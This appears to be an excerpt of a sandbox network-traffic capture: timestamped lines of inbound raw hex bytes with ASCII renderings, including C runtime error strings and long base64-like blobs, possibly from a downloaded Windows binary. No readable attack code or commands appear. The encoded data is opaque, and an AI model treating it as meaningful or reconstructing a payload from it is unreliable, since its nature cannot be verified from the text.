2022-11-13 18:26:59 UTC	134	IN	Data Raw: 30 00 31 00 39 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 61 00 62 00 6c 00 65 00 20 00 74 00 6f 00 20 00 6f 00 70 00 65 00 6e 00 20 00 63 00 6f 00 6e 00 73 00 6f 00 6c 00 65 00 20 00 64 00 65 00 76 00 69 00 63 00 65 00 0d 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 31 00 38 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 68 00 65 00 61 00 70 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 31 00 37 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 6d 00 75 00 6c 00 74 00 69 00 74 00 68 00 72 00 65 00 61 00 64 00 20 00 6c 00 6f 00 63 00 6b 00 20 00 65 00 72 00 72 00 6f 00 72 Data Ascii: 019- unable to open console deviceR6018- unexpected heap errorR6017- unexpected multithread lock error
2022-11-13 18:26:59 UTC	141	IN	Data Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 14 00 14 00 10 00 10 00 10 00 10 00 10 00 14 00 10 00 10 00 10 00 10 00 10 00 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 01 Data Ascii: H
2022-11-13 18:26:59 UTC	149	IN	Data Raw: 41 50 51 66 58 36 73 73 41 65 47 77 45 57 66 4b 39 6b 55 63 34 51 56 50 34 53 61 5a 6c 54 32 76 6f 51 59 6c 61 4d 46 63 67 77 51 63 35 6a 58 56 76 4a 6d 73 69 41 54 38 42 36 75 46 4e 6f 42 47 73 42 47 54 56 6d 55 32 4d 61 30 46 54 37 4d 54 64 56 4c 35 50 69 67 6e 33 41 71 56 43 41 4d 78 59 4f 51 39 49 59 6f 56 66 57 36 42 41 45 4b 43 72 6e 63 2f 6b 58 52 45 61 6a 78 6c 56 59 68 50 43 63 31 4d 6f 68 42 79 64 59 70 56 63 69 72 70 44 45 4f 43 4f 31 39 74 76 33 53 72 55 35 31 69 41 4c 51 2f 72 30 44 53 49 62 61 78 43 34 69 6f 35 43 44 51 49 4e 32 70 6c 36 51 77 53 6b 7a 66 4f 46 4b 6b 48 57 46 46 32 66 59 52 76 42 55 70 77 44 56 31 6c 65 46 65 6d 4a 36 74 55 4b 36 58 32 47 44 2b 47 6e 30 64 76 53 65 73 33 68 31 37 67 5a 67 63 53 76 38 58 44 66 64 57 59 30 61 Data Ascii: APQfX6ssAeGwEWfK9kUc4QVP4SaZlT2voQYlaMFcgwQc5jXVvJmsiAT8B6uFNoBGsBGTVmU2Ma0FT7MTdVL5Pign3AqVCAMxYOQ9IYoVfW6BAEKCrnc/kXREajxlVYhPCc1MohBydYpVcirpDEOCO19tv3SrU51iALQ/r0DSIbaxC4io5CDQIN2pl6QwSkzfOFKkHWFF2fYRvBUpwDV1leFemJ6tUK6X2GD+Gn0dvSes3h17gZgcSv8XDfdWY0a
2022-11-13 18:26:59 UTC	157	IN	Data Raw: 79 52 64 67 4e 69 49 54 4c 67 4f 31 4f 70 77 67 2b 49 2b 47 49 56 39 74 38 33 51 6b 4d 4f 34 47 4a 45 56 53 42 38 38 6d 45 2b 2f 4c 5a 48 64 58 4c 64 78 45 54 6d 67 54 34 35 48 38 46 6c 78 72 30 4a 36 39 61 58 6b 72 7a 58 77 67 58 72 6a 32 44 71 66 50 59 77 42 31 59 62 41 4d 32 69 47 31 69 59 6a 5a 56 32 56 6f 66 58 64 41 58 32 66 6e 74 6c 46 34 53 77 58 7a 4f 6d 68 35 62 4d 4a 32 58 47 31 34 44 4d 70 51 62 57 49 50 38 64 70 4c 52 46 4e 5a 58 56 46 6b 64 31 6a 68 75 54 4a 71 51 47 49 41 37 33 56 53 64 38 2b 41 55 79 56 6f 52 49 2f 6f 49 56 39 69 2f 43 70 4b 65 47 31 66 7a 34 68 53 54 30 76 57 4b 46 49 78 5a 4c 41 53 71 6d 49 55 61 6b 44 6d 6b 6d 4e 31 55 76 6b 47 39 77 6c 78 4d 67 43 69 49 2b 35 61 37 41 33 2b 71 2f 63 6a 53 63 63 77 68 64 36 6f 55 32 54 Data Ascii: yRdgNiITLgO1Opwg+I+GIV9t83QkMO4GJEVSB88mE+/LZHdXLdxETmgT45H8Flxr0J69aXkrzXwgXrj2DqfPYwB1YbAM2iG1iYjZV2VofXdAX2fntlF4SwXzOmh5bMJ2XG14DMpQbWIP8dpLRFNZXVFkd1jhuTJqQGIA73VSd8+AUyVoRI/oIV9i/CpKeG1fz4hST0vWKFIxZLASqmIUakDmkmN1UvkG9wlxMgCiI+5a7A3+q/cjSccwhd6oU2T
2022-11-13 18:26:59 UTC	165	IN	Data Raw: 2b 4a 6a 52 66 31 39 74 64 37 35 34 63 6d 31 69 44 2f 48 53 52 6b 52 54 35 61 33 37 5a 58 64 58 61 74 47 71 59 6b 42 66 36 5a 69 64 56 33 68 4c 4e 39 59 6f 62 6e 6c 6a 78 39 70 37 5a 58 67 78 52 50 78 39 5a 67 42 31 30 37 52 6d 58 57 52 57 50 75 42 61 56 47 56 56 73 5a 47 32 54 6d 68 6a 65 74 61 65 53 54 68 53 70 4a 4f 53 64 30 59 68 55 4f 6b 6e 4d 30 74 34 37 4a 6c 52 58 46 4a 50 53 39 64 54 56 7a 46 6b 39 71 7a 37 45 54 42 71 54 39 6f 74 62 48 56 53 76 77 36 58 4b 68 39 6f 65 51 67 44 6a 6d 6e 6b 50 5a 34 67 50 63 49 48 69 54 44 39 4a 41 48 38 42 39 39 30 79 38 2f 65 37 64 32 34 34 51 33 77 6e 34 4b 30 75 48 37 43 62 66 32 6b 48 64 62 64 35 73 78 65 71 6a 32 43 78 43 68 74 59 6f 45 34 34 57 73 66 62 38 57 58 56 4e 64 34 31 69 44 6d 62 4a 4a 41 58 2b 6b Data Ascii: +JjRf19td754cm1iD/HSRkRT5a37ZXdXatGqYkBf6ZidV3hLN9Yobnljx9p7ZXgxRPx9ZgB107RmXWRWPuBaVGVVsZG2TmhjetaeSThSpJOSd0YhUOknM0t47JlRXFJPS9dTVzFk9qz7ETBqT9otbHVSvw6XKh9oeQgDjmnkPZ4gPcIHiTD9JAH8B990y8/e7d244Q3wn4K0uH7Cbf2kHdbd5sxeqj2CxChtYoE44Wsfb8WXVNd41iDmbJJAX+k
2022-11-13 18:26:59 UTC	173	IN	Data Raw: 58 32 33 35 64 47 6a 4e 48 35 33 2f 39 43 64 73 50 51 6c 6e 56 76 59 68 41 4a 4f 6f 56 54 44 68 44 53 69 66 67 73 33 35 30 75 47 53 6b 38 39 74 38 44 59 78 6f 42 6f 61 69 6b 47 30 68 2b 77 76 64 2f 79 53 37 47 62 53 45 53 48 44 56 59 4f 6f 6f 68 42 58 54 77 46 66 61 4f 67 34 4e 59 2b 71 36 62 69 73 50 52 37 69 4d 30 59 66 46 78 37 44 79 67 30 4b 33 54 2f 6b 45 34 34 68 4e 47 48 58 52 41 4e 79 2f 34 38 72 65 4f 46 46 36 2b 31 68 64 52 62 7a 42 6c 38 57 72 69 30 4f 36 42 4d 43 31 43 41 48 65 63 49 38 53 55 4c 6f 65 66 42 4f 52 42 76 6e 63 36 58 68 64 56 64 6c 6b 6e 55 4e 78 4d 39 6f 59 2f 51 66 48 78 38 73 2b 52 33 70 44 41 52 72 4b 31 4e 46 2b 58 51 73 70 43 79 64 2f 37 51 33 4b 45 4c 53 45 54 46 78 55 63 39 2b 37 68 42 58 34 30 55 7a 37 57 46 31 75 34 35 Data Ascii: X235dGjNH53/9CdsPQlnVvYhAJOoVTDhDSifgs350uGSk89t8DYxoBoaikG0h+wvd/yS7GbSESHDVYOoohBXTwFfaOg4NY+q6bisPR7iM0YfFx7Dyg0K3T/kE44hNGHXRANy/48reOFF6+1hdRbzBl8Wri0O6BMC1CAHecI8SULoefBORBvnc6XhdVdlknUNxM9oY/QfHx8s+R3pDARrK1NF+XQspCyd/7Q3KELSETFxUc9+7hBX40Uz7WF1u45
2022-11-13 18:26:59 UTC	181	IN	Data Raw: 46 58 2f 70 46 6c 57 44 6e 6b 67 39 6c 57 42 41 36 76 5a 47 49 5a 34 41 55 43 48 4b 50 55 57 2b 73 34 71 74 7a 6a 46 37 52 39 43 63 58 4c 41 53 68 54 41 77 61 6b 43 65 44 59 4e 38 30 77 32 72 4d 35 67 6c 61 4c 34 6d 72 71 55 73 62 58 69 36 44 70 44 67 62 6f 44 4e 6f 37 2b 30 6f 2b 30 62 32 65 55 43 76 37 63 6a 4f 57 71 48 47 6e 43 71 79 6c 4a 34 69 6c 56 4b 4b 65 4d 30 65 37 48 41 35 37 41 2f 51 56 53 35 68 32 53 4a 49 45 72 4f 41 55 76 42 59 54 46 6b 39 69 4a 39 43 46 74 71 51 4a 67 74 68 36 4c 73 65 45 76 35 50 38 46 74 2b 42 61 69 56 55 78 76 65 50 59 4f 61 4f 38 42 41 48 58 5a 41 6c 53 6b 68 58 33 37 74 5a 35 55 72 35 54 5a 62 38 6b 53 65 4b 49 51 51 6e 63 44 74 52 2f 56 41 7a 78 7a 61 36 67 61 66 52 4e 30 57 77 54 6b 4a 78 44 30 4a 31 38 75 55 74 57 Data Ascii: FX/pFlWDnkg9lWBA6vZGIZ4AUCHKPUW+s4qtzjF7R9CcXLAShTAwakCeDYN80w2rM5glaL4mrqUsbXi6DpDgboDNo7+0o+0b2eUCv7cjOWqHGnCqylJ4ilVKKeM0e7HA57A/QVS5h2SJIErOAUvBYTFk9iJ9CFtqQJgth6LseEv5P8Ft+BaiVUxvePYOaO8BAHXZAlSkhX37tZ5Ur5TZb8kSeKIQQncDtR/VAzxza6gafRN0WwTkJxD0J18uUtW
2022-11-13 18:26:59 UTC	188	IN	Data Raw: 6a 36 30 38 77 4c 33 69 4a 6d 68 35 36 4e 4f 5a 58 47 31 34 75 73 61 34 62 6d 49 41 6e 56 56 6f 52 56 4f 6a 30 2f 46 6e 64 31 66 4a 2b 54 42 71 44 4e 49 6b 52 78 58 54 2f 59 73 37 55 69 55 4c 68 5a 79 35 5a 64 53 39 2b 62 79 4c 65 32 31 69 64 71 63 4e 43 43 2f 57 70 46 55 78 5a 45 54 65 34 4a 55 7a 61 6b 44 65 33 61 4e 32 55 6e 67 47 49 6b 30 64 72 2f 79 72 52 53 46 66 44 74 41 78 53 2f 6e 67 71 67 4e 31 55 6c 57 58 6d 37 2f 58 68 4b 78 30 56 32 57 33 49 36 47 62 6d 4f 33 62 64 6c 4a 34 6a 61 78 53 4a 51 50 38 32 30 55 68 58 33 48 78 74 50 4e 37 62 57 4b 34 75 70 6c 74 65 74 6a 70 37 6a 4a 6b 64 36 43 45 48 62 33 76 4d 46 35 6f 59 31 36 59 4d 4d 4a 38 64 67 32 35 6b 47 43 4d 59 4e 53 2f 75 64 68 4e 38 65 44 61 41 33 56 53 6a 75 6e 72 5a 31 59 78 61 66 62 Data Ascii: j608wL3iJmh56NOZXG14usa4bmIAnVVoRVOj0/Fnd1fJ+TBqDNIkRxXT/Ys7UiULhZy5ZdS9+byLe21idqcNCC/WpFUxZETe4JUzakDe3aN2UngGIk0dr/yrRSFfDtAxS/ngqgN1UlWXm7/XhKx0V2W3I6GbmO3bdlJ4jaxSJQP820UhX3HxtPN7bWK4upltetjp7jJkd6CEHb3vMF5oY16YMMJ8dg25kGCMYNS/udhN8eDaA3VSjunrZ1Yxafb
2022-11-13 18:26:59 UTC	196	IN	Data Raw: 70 70 4b 48 39 67 39 63 4e 66 2f 78 64 56 4c 33 6e 39 4c 64 49 48 33 74 41 33 4d 6c 6c 46 52 4f 47 46 7a 6a 4c 31 45 4b 6a 36 72 35 75 43 44 68 4c 55 63 65 53 68 74 4a 49 43 62 43 50 45 6b 36 75 4f 70 41 71 32 33 53 45 48 4a 70 37 79 74 58 5a 5a 4a 31 36 64 4e 42 61 47 4f 6b 4e 2f 76 4b 54 64 47 2b 35 56 6a 69 78 31 54 63 37 75 6f 36 4d 66 4d 67 34 66 65 55 36 68 6a 43 50 43 42 39 2b 37 57 65 56 4b 2b 55 32 57 2f 4a 45 75 76 69 41 4e 45 48 33 36 70 57 34 69 78 64 4e 32 39 78 58 32 33 35 64 57 38 73 63 6a 48 2f 69 70 4d 72 59 41 64 74 33 58 31 41 49 36 43 45 66 76 71 37 71 56 79 69 6f 70 78 55 38 51 63 63 42 6b 34 73 58 54 63 42 71 42 74 4a 4c 49 6b 45 6c 4b 6b 73 67 51 46 32 47 7a 36 43 45 4f 58 32 49 46 4d 48 63 43 6b 77 61 6f 45 37 54 44 4e 35 30 77 78 Data Ascii: ppKH9g9cNf/xdVL3n9LdIH3tA3MllFROGFzjL1EKj6r5uCDhLUceShtJICbCPEk6uOpAq23SEHJp7ytXZZJ16dNBaGOkN/vKTdG+5Vjix1Tc7uo6MfMg4feU6hjCPCB9+7WeVK+U2W/JEuviANEH36pW4ixdN29xX235dW8scjH/ipMrYAdt3X1AI6CEfvq7qVyiopxU8QccBk4sXTcBqBtJLIkElKksgQF2Gz6CEOX2IFMHcCkwaoE7TDN50wx
2022-11-13 18:26:59 UTC	204	IN	Data Raw: 4e 4f 55 44 63 7a 55 36 6b 6d 39 41 45 2b 4d 69 42 64 6b 73 62 32 6a 5a 61 55 77 68 69 39 55 51 58 32 32 2f 64 57 38 51 51 52 41 41 64 65 71 2b 74 4b 4f 55 31 33 56 41 48 32 2f 66 71 73 2f 72 4e 48 73 41 63 48 4a 56 65 49 78 38 64 6b 55 6c 4c 57 4e 47 6f 42 4e 4a 47 4b 49 44 42 61 50 6a 64 46 45 79 6e 65 41 6c 71 70 46 31 51 43 66 7a 42 31 55 77 34 51 78 37 4f 4a 53 55 36 68 48 4b 4c 6a 72 6b 67 6e 33 71 45 67 55 50 35 6a 51 56 47 34 2b 4d 53 63 71 6b 75 30 79 4f 6b 6f 31 51 75 43 68 54 42 77 34 52 46 44 70 54 31 69 78 48 4a 65 6f 46 52 2f 61 56 70 43 52 64 4d 7a 50 41 62 55 50 35 52 57 38 6f 44 75 77 37 57 35 55 4c 59 41 76 70 65 6a 46 6b 2f 42 74 42 44 63 65 4c 67 62 56 74 36 69 46 32 49 4d 70 4d 64 6e 30 79 74 6d 46 47 61 64 51 75 47 48 58 41 4e 45 6b Data Ascii: NOUDczU6km9AE+MiBdksb2jZaUwhi9UQX22/dW8QQRAAdeq+tKOU13VAH2/fqs/rNHsAcHJVeIx8dkUlLWNGoBNJGKIDBaPjdFEyneAlqpF1QCfzB1Uw4Qx7OJSU6hHKLjrkgn3qEgUP5jQVG4+MScqku0yOko1QuChTBw4RFDpT1ixHJeoFR/aVpCRdMzPAbUP5RW8oDuw7W5ULYAvpejFk/BtBDceLgbVt6iF2IMpMdn0ytmFGadQuGHXANEk
2022-11-13 18:26:59 UTC	212	IN	Data Raw: 70 65 6f 50 41 44 68 53 7a 4b 61 45 6e 4c 6e 6d 47 6e 56 44 41 45 74 34 31 59 65 71 64 56 4b 4f 4b 55 74 6f 31 33 78 38 4b 76 72 49 67 66 45 50 57 46 7a 70 46 6d 32 71 45 69 61 64 46 71 34 39 59 56 37 76 4e 6c 39 74 64 37 58 78 65 47 31 69 36 65 32 76 73 4c 75 55 49 58 59 50 5a 33 64 58 33 62 53 7a 5a 58 34 53 35 53 68 6c 30 77 31 72 73 53 58 72 4f 50 49 75 5a 74 61 2b 31 61 56 32 4f 32 65 73 69 41 50 38 42 32 2f 46 46 6b 53 55 5a 32 52 33 31 68 42 31 49 46 59 39 58 61 38 6d 58 54 46 64 53 7a 6a 5a 61 45 43 4f 67 6d 33 72 6a 6f 52 37 2b 34 71 52 61 4f 74 4e 58 64 4d 43 62 50 74 38 5a 57 2f 6c 41 6e 2b 4b 38 51 49 30 68 78 70 77 5a 6d 42 53 65 4d 42 39 53 71 68 6b 75 61 4b 6e 49 74 59 67 59 4c 41 4f 59 41 6b 51 2f 34 71 54 4b 6c 78 62 35 53 4d 70 6e 79 73 Data Ascii: peoPADhSzKaEnLnmGnVDAEt41YeqdVKOKUto13x8KvrIgfEPWFzpFm2qEiadFq49YV7vNl9td7XxeG1i6e2vsLuUIXYPZ3dX3bSzZX4S5Shl0w1rsSXrOPIuZta+1aV2O2esiAP8B2/FFkSUZ2R31hB1IFY9Xa8mXTFdSzjZaECOgm3rjoR7+4qRaOtNXdMCbPt8ZW/lAn+K8QI0hxpwZmBSeMB9SqhkuaKnItYgYLAOYAkQ/4qTKlxb5SMpnys
2022-11-13 18:26:59 UTC	219	IN	Data Raw: 36 62 73 6d 6f 72 69 4b 51 4b 67 53 56 62 6c 55 63 33 33 73 46 7a 67 2f 32 55 31 45 6c 43 46 6d 4a 6d 46 33 56 36 51 77 41 47 37 4c 45 6c 69 55 6c 4f 72 48 48 66 64 63 44 71 4b 6f 69 6b 58 72 6e 6f 52 2b 75 41 5a 49 35 69 38 77 67 72 4e 6b 6a 6f 4b 4e 56 66 75 6c 6e 6c 48 73 47 41 44 72 44 57 2f 33 4d 6c 73 76 2b 54 34 49 65 75 42 48 42 4b 51 44 43 54 44 57 65 44 47 4b 46 55 56 68 67 54 68 36 49 50 44 51 6f 39 64 30 54 45 65 69 6d 71 71 78 4c 32 68 43 5a 6d 4e 31 30 77 31 6a 41 4e 4b 71 72 7a 33 6f 43 77 6b 62 35 6a 30 42 77 43 31 56 36 55 32 46 75 74 31 52 55 6d 51 65 75 6e 73 2f 30 72 35 61 74 5a 57 38 6f 4a 63 72 2f 67 35 63 4b 33 44 52 34 53 67 6d 50 52 76 69 46 2b 41 44 47 61 43 5a 6f 61 37 4d 50 64 47 6a 58 4a 51 67 63 68 46 67 72 56 64 6c 6b 6e 52 Data Ascii: 6bsmoriKQKgSVblUc33sFzg/2U1ElCFmJmF3V6QwAG7LEliUlOrHHfdcDqKoikXrnoR+uAZI5i8wgrNkjoKNVfulnlHsGADrDW/3Mlsv+T4IeuBHBKQDCTDWeDGKFUVhgTh6IPDQo9d0TEeimqqxL2hCZmN10w1jANKqrz3oCwkb5j0BwC1V6U2Fut1RUmQeuns/0r5atZW8oJcr/g5cK3DR4SgmPRviF+ADGaCZoa7MPdGjXJQgchFgrVdlknR
2022-11-13 18:26:59 UTC	227	IN	Data Raw: 50 51 31 33 56 2b 51 59 33 49 4c 51 36 6b 2b 69 45 4c 35 37 79 6b 32 2b 78 50 48 58 58 6f 46 6b 76 77 53 32 4d 55 76 35 4b 49 4a 58 6a 6c 4a 50 78 52 61 45 76 42 6d 62 69 4a 59 41 74 54 72 72 44 62 38 78 64 74 39 57 2b 54 37 59 53 6c 32 47 66 69 66 4e 62 4c 38 70 38 33 53 6e 38 7a 69 47 69 7a 69 36 70 35 57 75 5a 46 59 43 76 7a 2f 63 45 58 46 59 49 73 73 6a 54 42 4d 39 32 62 73 44 73 77 34 42 43 44 48 67 67 6e 45 43 72 72 54 39 68 7a 44 6b 50 69 52 39 47 73 59 77 64 33 51 53 75 43 68 54 64 7a 49 64 73 34 59 51 31 4f 78 48 37 56 4a 34 53 37 50 6d 41 65 42 35 59 30 5a 6b 62 4b 54 78 64 57 39 41 35 75 59 6b 35 56 4a 50 52 42 4c 76 6a 72 67 67 55 32 66 75 30 52 54 71 51 46 39 6f 36 67 46 32 55 4d 4a 38 64 67 55 67 38 70 71 75 4c 35 70 74 65 48 6e 41 66 61 4b Data Ascii: PQ13V+QY3ILQ6k+iEL57yk2+xPHXXoFkvwS2MUv5KIJXjlJPxRaEvBmbiJYAtTrrDb8xdt9W+T7YSl2GfifNbL8p83Sn8ziGizi6p5WuZFYCvz/cEXFYIssjTBM92bsDsw4BCDHggnECrrT9hzDkPiR9GsYwd3QSuChTdzIds4YQ1OxH7VJ4S7PmAeB5Y0ZkbKTxdW9A5uYk5VJPRBLvjrggU2fu0RTqQF9o6gF2UMJ8dgUg8pquL5pteHnAfaK
2022-11-13 18:26:59 UTC	235	IN	Data Raw: 37 70 37 5a 6a 4c 79 67 6c 36 51 77 4d 71 61 41 4f 46 4b 6b 48 52 6b 76 67 6d 41 38 37 41 31 52 39 68 77 74 41 59 73 77 4d 71 65 64 39 47 52 57 39 69 45 58 4b 6e 35 56 4d 43 4c 4c 68 77 4d 6d 46 52 7a 78 44 6c 6a 54 59 41 68 72 44 37 6e 65 6e 67 41 59 4d 38 6f 31 44 65 75 51 4c 45 33 4f 4d 54 4f 6b 34 53 6f 32 2f 42 49 46 33 48 57 4b 68 78 6f 49 35 64 74 53 65 4d 70 39 4d 6e 37 6d 65 57 50 48 5a 44 2f 6b 63 73 36 30 2b 52 67 43 61 7a 4a 53 54 38 38 57 42 4e 39 30 67 4c 41 53 42 65 57 37 61 6b 44 65 4c 51 4e 70 63 48 68 4c 75 53 64 46 68 4e 52 6a 52 71 6f 61 44 66 46 30 6f 37 38 6f 38 6e 38 73 55 6b 2f 46 48 76 54 38 67 47 36 54 33 43 44 46 75 53 2f 51 35 32 74 6f 57 65 4c 35 44 71 68 65 75 35 65 47 34 6a 4f 78 56 50 56 79 31 59 77 39 34 5a 4c 54 64 56 4c Data Ascii: 7p7ZjLygl6QwMqaAOFKkHRkvgmA87A1R9hwtAYswMqed9GRW9iEXKn5VMCLLhwMmFRzxDljTYAhrD7nengAYM8o1DeuQLE3OMTOk4So2/BIF3HWKhxoI5dtSeMp9Mn7meWPHZD/kcs60+RgCazJST88WBN90gLASBeW7akDeLQNpcHhLuSdFhNRjRqoaDfF0o78o8n8sUk/FHvT8gG6T3CDFuS/Q52toWeL5Dqheu5eG4jOxVPVy1Yw94ZLTdVL
2022-11-13 18:26:59 UTC	243	IN	Data Raw: 4b 2b 72 45 36 33 5a 64 78 31 52 4d 38 6a 58 72 69 50 6b 59 63 54 4f 68 44 34 75 44 46 6e 2b 62 43 47 52 33 31 69 42 4f 35 57 2b 2f 6f 4f 6b 6d 62 69 76 54 53 7a 69 54 51 48 4e 39 34 6a 4d 36 64 69 57 48 7a 6f 77 39 63 72 54 71 64 56 4b 4f 4b 55 78 76 33 58 78 37 67 4c 61 6b 76 7a 50 6a 46 55 44 70 4a 6d 71 78 6f 55 73 34 30 31 42 33 6b 34 35 46 49 5a 67 6f 56 2f 48 4a 65 47 33 6a 52 56 72 79 53 37 75 73 35 53 4d 65 51 4e 75 71 6d 70 4a 31 54 65 58 4a 61 47 50 30 48 31 2b 6b 4b 74 4a 41 36 51 78 45 62 75 62 58 43 4c 39 30 61 50 4d 75 59 67 44 30 46 32 7a 79 69 70 75 70 73 43 46 55 38 34 46 56 4d 41 45 46 66 43 2f 71 4d 48 48 41 67 6e 70 45 6c 2b 4d 30 51 4c 48 41 35 39 36 33 45 48 36 35 68 32 65 4a 49 48 48 4f 4d 58 43 44 51 6a 31 6b 73 42 4a 71 68 61 56 Data Ascii: K+rE63Zdx1RM8jXriPkYcTOhD4uDFn+bCGR31iBO5W+/oOkmbivTSziTQHN94jM6diWHzow9crTqdVKOKUxv3Xx7gLakvzPjFUDpJmqxoUs401B3k45FIZgoV/HJeG3jRVryS7us5SMeQNuqmpJ1TeXJaGP0H1+kKtJA6QxEbubXCL90aPMuYgD0F2zyipupsCFU84FVMAEFfC/qMHHAgnpEl+M0QLHA5963EH65h2eJIHHOMXCDQj1ksBJqhaV
2022-11-13 18:26:59 UTC	251	IN	Data Raw: 41 48 56 64 79 32 4a 51 5a 46 59 4d 56 30 39 58 5a 56 71 30 54 30 4a 66 61 46 37 48 44 58 68 4c 4e 39 5a 47 61 58 6c 6a 65 39 50 77 62 58 67 2b 7a 38 6c 74 59 67 42 49 79 71 78 45 55 32 76 54 5a 6d 42 33 56 36 49 51 41 4d 54 50 58 32 6a 62 32 69 79 6f 47 72 6b 6e 46 58 53 55 70 38 43 67 4b 6c 31 35 57 49 33 2b 71 69 63 67 78 50 5a 50 52 4e 49 52 64 6b 52 2b 2b 66 4c 6b 47 42 44 56 69 78 68 76 34 6a 42 79 48 35 67 34 55 71 51 64 57 62 55 48 2b 76 69 71 50 52 6b 35 4b 32 31 69 67 54 68 36 52 53 51 71 44 39 64 45 54 50 6b 72 48 54 37 33 4c 31 69 32 32 32 4e 31 67 78 56 54 73 78 38 39 6e 35 68 49 6a 50 43 32 62 72 4c 77 6f 6e 37 6b 4c 78 67 65 46 31 63 4a 32 69 46 4f 57 69 46 76 43 2b 77 51 4b 4f 73 31 52 32 30 2b 62 6c 49 38 77 48 56 4b 59 65 4d 38 53 77 36 Data Ascii: AHVdy2JQZFYMV09XZVq0T0JfaF7HDXhLN9ZGaXlje9PwbXg+z8ltYgBIyqxEU2vTZmB3V6IQAMTPX2jb2iyoGrknFXSUp8CgKl15WI3+qicgxPZPRNIRdkR++fLkGBDVixhv4jByH5g4UqQdWbUH+viqPRk5K21igTh6RSQqD9dETPkrHT73L1i222N1gxVTsx89n5hIjPC2brLwon7kLxgeF1cJ2iFOWiFvC+wQKOs1R20+blI8wHVKYeM8Sw6
2022-11-13 18:26:59 UTC	259	IN	Data Raw: 34 4b 55 77 61 6b 41 45 46 6d 4e 31 32 66 57 37 4f 46 49 6c 6e 35 69 69 72 43 58 57 2b 49 67 78 53 33 67 47 35 2f 42 31 55 6b 39 2f 32 75 47 6d 4d 57 52 33 37 38 37 2f 6d 73 44 42 32 70 68 6a 64 56 4c 38 38 44 68 53 72 75 57 4a 59 30 59 68 71 49 79 35 32 30 33 78 2b 4a 49 41 64 56 4c 4f 38 61 4e 6b 56 6a 45 59 4b 46 4a 6c 6b 6e 52 4f 4a 49 74 6d 59 33 58 54 50 47 39 63 39 62 61 58 68 67 67 43 42 54 73 6d 38 58 56 76 48 4f 77 57 4a 42 46 54 31 61 43 73 6f 39 50 4a 5a 48 64 58 75 4e 51 77 61 70 48 36 6b 47 4e 31 55 72 6e 75 77 46 49 6c 61 48 51 76 79 32 52 2f 37 4d 33 4a 53 33 68 74 69 4e 58 79 30 4d 37 78 71 32 52 57 4d 59 2f 69 70 38 66 65 76 5a 4a 41 58 32 6a 6f 4d 58 59 63 51 50 44 5a 6f 4a 68 35 59 30 5a 6c 31 43 46 63 57 63 41 73 53 52 4b 4a 4f 58 5a Data Ascii: 4KUwakAEFmN12fW7OFIln5iirCXW+IgxS3gG5/B1Uk9/2uGmMWR3787/msDB2phjdVL88DhSruWJY0YhqIy5203x+JIAdVLO8aNkVjEYKFJlknROJItmY3XTPG9c9baXhggCBTsm8XVvHOwWJBFT1aCso9PJZHdXuNQwapH6kGN1UrnuwFIlaHQvy2R/7M3JS3htiNXy0M7xq2RWMY/ip8fevZJAX2joMXYcQPDZoJh5Y0Zl1CFcWcAsSRKJOXZ
2022-11-13 18:26:59 UTC	266	IN	Data Raw: 50 53 38 76 34 67 43 75 34 38 4a 45 46 65 49 74 6a 63 76 36 49 56 2f 6d 4e 63 57 38 6d 55 61 6f 30 5a 78 52 68 59 57 36 59 74 39 38 6b 50 59 53 6b 52 48 49 6c 62 2f 65 48 5a 64 68 32 49 75 30 2f 78 64 39 46 68 70 6a 52 75 41 36 4e 58 53 77 44 69 44 74 35 41 42 31 30 77 49 63 47 37 39 36 39 65 55 79 44 7a 34 4f 7a 35 58 42 4b 6a 44 4c 66 57 4b 2b 6a 48 30 43 74 72 31 35 59 34 64 45 44 32 6a 35 64 42 74 30 52 32 49 41 39 43 63 66 64 74 4d 48 69 4c 41 70 4a 77 33 56 78 66 58 72 4e 51 2b 64 6c 34 57 4e 38 77 35 6f 32 57 41 77 38 69 61 79 71 68 71 52 38 33 53 7a 50 4f 59 76 38 50 77 57 61 32 79 37 43 30 6f 78 5a 4c 41 53 4e 64 49 65 61 6b 41 62 34 37 73 38 32 62 51 4b 73 34 35 73 51 37 59 69 62 66 34 54 56 71 47 36 42 69 68 69 4c 74 6a 4e 6d 53 52 73 2f 4a 4f Data Ascii: PS8v4gCu48JEFeItjcv6IV/mNcW8mUao0ZxRhYW6Yt98kPYSkRHIlb/eHZdh2Iu0/xd9FhpjRuA6NXSwDiDt5AB10wIcG7969eUyDz4Oz5XBKjDLfWK+jH0Ctr15Y4dED2j5dBt0R2IA9CcfdtMHiLApJw3VxfXrNQ+dl4WN8w5o2WAw8iayqhqR83SzPOYv8PwWa2y7C0oxZLASNdIeakAb47s82bQKs45sQ7Yibf4TVqG6BihiLtjNmSRs/JO
